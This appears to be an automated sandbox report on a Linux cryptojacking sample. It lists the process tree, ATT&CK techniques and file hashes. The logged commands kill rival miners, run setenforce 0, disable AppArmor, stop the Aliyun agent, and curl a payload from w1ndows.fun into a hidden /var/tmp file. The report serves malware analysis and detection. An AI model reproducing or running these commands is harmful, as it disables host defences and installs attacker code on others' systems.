  2⤵
  PID:1772
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:1771
- /bin/grep
  grep :5555
  2⤵
  PID:1770
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1780
- /bin/grep
  grep -v -
  2⤵
  PID:1779
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1778
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1777
- /bin/grep
  grep :6666
  2⤵
  PID:1776
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1786
- /bin/grep
  grep -v -
  2⤵
  PID:1785
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1784
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1783
- /bin/grep
  grep :6665
  2⤵
  PID:1782
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1792
- /bin/grep
  grep -v -
  2⤵
  PID:1791
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1790
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1789
- /bin/grep
  grep :6667
  2⤵
  PID:1788
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1798
- /bin/grep
  grep -v -
  2⤵
  PID:1797
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1796
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1795
- /bin/grep
  grep :7777
  2⤵
  PID:1794
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1804
- /bin/grep
  grep -v -
  2⤵
  PID:1803
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1802
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1801
- /bin/grep
  grep :8444
  2⤵
  PID:1800
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1810
- /bin/grep
  grep -v -
  2⤵
  PID:1809
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1808
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1807
- /bin/grep
  grep :3347
  2⤵
  PID:1806
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1816
- /bin/grep
  grep -v -
  2⤵
  PID:1815
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1814
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1813
- /bin/grep
  grep :14444
  2⤵
  PID:1812
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1822
- /bin/grep
  grep -v -
  2⤵
  PID:1821
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1820
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1819
- /bin/grep
  grep :14433
  2⤵
  PID:1818
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1828
- /bin/grep
  grep -v -
  2⤵
  PID:1827
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1826
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1825
- /bin/grep
  grep :13531
  2⤵
  PID:1824
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1834
- /bin/grep
  grep -v -
  2⤵
  PID:1833
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1832
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1831
- /bin/grep
  grep :7890
  2⤵
  PID:1830
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1840
- /bin/grep
  grep -v -
  2⤵
  PID:1839
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1838
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1837
- /bin/grep
  grep :3456
  2⤵
  PID:1836
- /bin/systemctl
  systemctl stop c3pool_miner.service
  2⤵
  PID:1841
- /bin/systemctl
  systemctl stop skypool_miner.service
  2⤵
  PID:1845
- /bin/systemctl
  systemctl disable c3pool_miner.service
  2⤵
  PID:1846
- /bin/systemctl
  systemctl disable skypool_miner.service
  2⤵
  PID:1850
- /usr/bin/killall
  killall log_rot
  2⤵
  PID:1854
- /usr/bin/pkill
  pkill -f log_rot
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1858
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:1859
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:1860
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1861
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1862
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    PID:1863
- - /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:1869
- - /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    PID:1868
- /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1860
- /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1860
- /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1860
- /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1860
- /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1860
- /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1860
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  - Disables AppArmor
  PID:1873
- - /lib/systemd/systemd-sysv-install
    /lib/systemd/systemd-sysv-install disable apparmor
    3⤵
    PID:1877
  - - /usr/bin/getopt
      getopt -o r: --long root: -- disable apparmor
      4⤵
      PID:1878
  - - /usr/sbin/update-rc.d
      /usr/sbin/update-rc.d apparmor defaults
      4⤵
      PID:1879
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1880
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1880
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1880
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1880
    - - /sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1880
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1880
  - - /usr/sbin/update-rc.d
      /usr/sbin/update-rc.d apparmor disable
      4⤵
      Flushes firewall rules
      PID:1881
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1885
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1885
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1885
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1885
    - - /sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1885
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1885
- /usr/sbin/service
  service aliyun.service stop
  2⤵
  PID:1889
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1893
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1894
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Disables AppArmor
    PID:1895
- - /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:1898
- - /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    - Disables AppArmor
    PID:1897
- /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1889
- /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1889
- /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1889
- /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1889
- /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1889
- /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1889
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  - Disables AppArmor
  PID:1905
- /usr/bin/curl
  curl https://w1ndows.fun:8443/docker.tar.gz -o /var/tmp/.docker.tar.gz
  2⤵
  PID:1909

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit